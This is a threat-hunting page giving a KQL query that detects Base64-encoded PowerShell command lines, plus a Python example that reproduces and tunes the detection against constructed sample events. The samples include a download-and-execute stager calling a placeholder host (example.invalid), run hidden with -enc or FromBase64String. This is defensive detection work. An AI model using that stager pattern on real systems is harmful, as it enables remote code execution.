Query Details
# PowerShell Base64 encoding

### Description

Hunting for Base64-encoded command lines in PowerShell is a core detection: encoding hides the script body from anyone glancing at the process command line, so it is a staple of downloaders, stagers and post-exploitation frameworks. The analytic below flags PowerShell hosts whose command line contains the literal string "base64" (for example a `[Convert]::FromBase64String(...)` call). Two caveats before deploying it: command lines that use `-EncodedCommand` (or its `-e`/`-ec`/`-enc` abbreviations) carry only the Base64 blob and no "base64" keyword, so they are not matched by this filter; and `arg_max(Timestamp, *) by DeviceName` keeps only the most recent hit per device, which is fine for a daily triage view but hides earlier executions. Fine tuning for your environment is required.

### References

- https://redcanary.com/threat-detection-report/techniques/powershell/

### Microsoft 365 Defender & Microsoft Sentinel

```
DeviceProcessEvents
// Define timeframe
| where Timestamp > ago(1d)
| where FileName has_any (@"powershell.exe", @"pwsh.exe", @"powershell_ise.exe")
| where ProcessCommandLine contains "base64"
| summarize arg_max(Timestamp, *) by DeviceName
```

### MITRE ATT&CK Mapping

- Tactic: Execution
- Technique ID: T1059.001 - [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/)

### Source

### Versioning

| Version | Date       | Comments        |
| ------- | ---------- | --------------- |
| 1.0     | 14/08/2023 | Initial publish |
This query detects Base64-encoded command lines in PowerShell. It restricts `DeviceProcessEvents` from the last day to the three PowerShell hosts (`powershell.exe`, `pwsh.exe`, `powershell_ise.exe`), keeps rows whose process command line contains the keyword "base64" (KQL `contains` is case-insensitive), and then returns only the most recent matching event per device via `arg_max`. Expect both noise (benign scripts that mention Base64) and misses (`-EncodedCommand` invocations carry no "base64" keyword), so adjust the filter for your environment. The query targets Microsoft 365 Defender and Microsoft Sentinel, is mapped to MITRE ATT&CK technique T1059.001 - Command and Scripting Interpreter: PowerShell, and was initially published on 14/08/2023.
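The following is an added example, not part of the original page or the author's query: it reproduces the KQL logic in Python over a handful of constructed `DeviceProcessEvents`-shaped records so the behaviour can be checked offline, and then shows the tuning the description calls for. `page_filter` is the page's predicate (PowerShell host plus the literal "base64"); `tuned_filter` instead extracts the Base64 blob from `-EncodedCommand`/`-e`/`-ec`/`-enc` or `FromBase64String('...')` and decodes it (UTF-16LE, which is what `-EncodedCommand` expects). The sample events, the `example.invalid` URL and the stager text are all constructed for the demonstration; the parameter abbreviations listed are the common ones, not every prefix `powershell.exe` accepts.

```python
import base64
import re
from typing import Callable, Optional

PS_BINARIES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# -EncodedCommand and its common abbreviations (-e, -ec, -enc). powershell.exe accepts any
# unambiguous parameter prefix, so this is an assumption covering the usual forms only.
ENCODED_COMMAND_RE = re.compile(
    r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# A Base64 literal handed straight to [Convert]::FromBase64String(...)
FROM_BASE64_RE = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]", re.IGNORECASE)


def page_filter(event: dict) -> bool:
    """The page's KQL predicate: PowerShell host and the literal 'base64' (case-insensitive)."""
    return (event["FileName"].lower() in PS_BINARIES
            and "base64" in event["ProcessCommandLine"].lower())


def decode_blob(raw: bytes) -> str:
    """-EncodedCommand payloads are UTF-16LE; FromBase64String payloads are usually UTF-16LE or UTF-8.
    Heuristic: every odd byte zero means UTF-16LE-encoded ASCII text."""
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded payload, else None."""
    for pattern in (ENCODED_COMMAND_RE, FROM_BASE64_RE):
        match = pattern.search(cmdline)
        if match:
            try:
                return decode_blob(base64.b64decode(match.group(1), validate=True))
            except ValueError:  # binascii.Error is a ValueError: not really Base64
                return None
    return None


def tuned_filter(event: dict) -> bool:
    """Tuned predicate: flag only command lines that actually carry a decodable Base64 payload."""
    return (event["FileName"].lower() in PS_BINARIES
            and extract_encoded_command(event["ProcessCommandLine"]) is not None)


def hunt(events: list, predicate: Callable[[dict], bool] = page_filter) -> dict:
    """Mirror of the KQL: apply the predicate, then arg_max(Timestamp, *) by DeviceName.
    Returns {DeviceName: latest matching event}; timestamps are ISO-8601 so string order works."""
    latest: dict = {}
    for event in events:
        if not predicate(event):
            continue
        current = latest.get(event["DeviceName"])
        if current is None or event["Timestamp"] > current["Timestamp"]:
            latest[event["DeviceName"]] = event
    return latest


def encode_for_powershell(script: str) -> str:
    """What -EncodedCommand expects: Base64 of the UTF-16LE script. Used only to build the samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry) shaped like DeviceProcessEvents rows.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    # -enc with the blob and no literal "base64" anywhere: the page's filter misses this one
    {"Timestamp": "2023-08-14T09:00:01Z", "DeviceName": "ws01", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -NoP -W Hidden -enc " + encode_for_powershell(STAGER)},
    # FromBase64String literal: both filters match it
    {"Timestamp": "2023-08-14T09:05:00Z", "DeviceName": "ws02", "FileName": "pwsh.exe",
     "ProcessCommandLine": 'pwsh.exe -c "IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(\''
                           + base64.b64encode(STAGER.encode()).decode("ascii") + '\')))"'},
    # Benign admin script whose path merely mentions Base64: keyword noise for the page's filter
    {"Timestamp": "2023-08-14T09:10:00Z", "DeviceName": "ws03", "FileName": "powershell.exe",
     "ProcessCommandLine": r"powershell.exe -File C:\scripts\Convert-Base64Report.ps1"},
    # Earlier encoded run on ws02: arg_max keeps only the 09:05 event, so this one never surfaces
    {"Timestamp": "2023-08-14T08:00:00Z", "DeviceName": "ws02", "FileName": "pwsh.exe",
     "ProcessCommandLine": "pwsh.exe -EncodedCommand " + encode_for_powershell("Get-Date")},
    # Not a PowerShell host: excluded by the FileName filter regardless of the keyword
    {"Timestamp": "2023-08-14T09:20:00Z", "DeviceName": "ws04", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c echo base64"},
]

if __name__ == "__main__":
    for label, predicate in (("page filter", page_filter), ("tuned filter", tuned_filter)):
        print(f"== {label} ==")
        for device, event in sorted(hunt(SAMPLE_EVENTS, predicate).items()):
            decoded = extract_encoded_command(event["ProcessCommandLine"])
            print(f"{device} {event['Timestamp']} decoded={decoded!r}")
```

Run as a script, the page's filter returns ws02 and ws03 (the benign script path is a false positive and the `-enc` stager on ws01 is missed), while the tuned filter returns ws01 and ws02 with the decoded stager, and in both cases the earlier 08:00 event on ws02 is hidden by `arg_max`. If you care about every execution rather than a per-device summary, drop the `summarize` or summarize by command line as well as device.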

Michalis Michalos
Released: August 14, 2023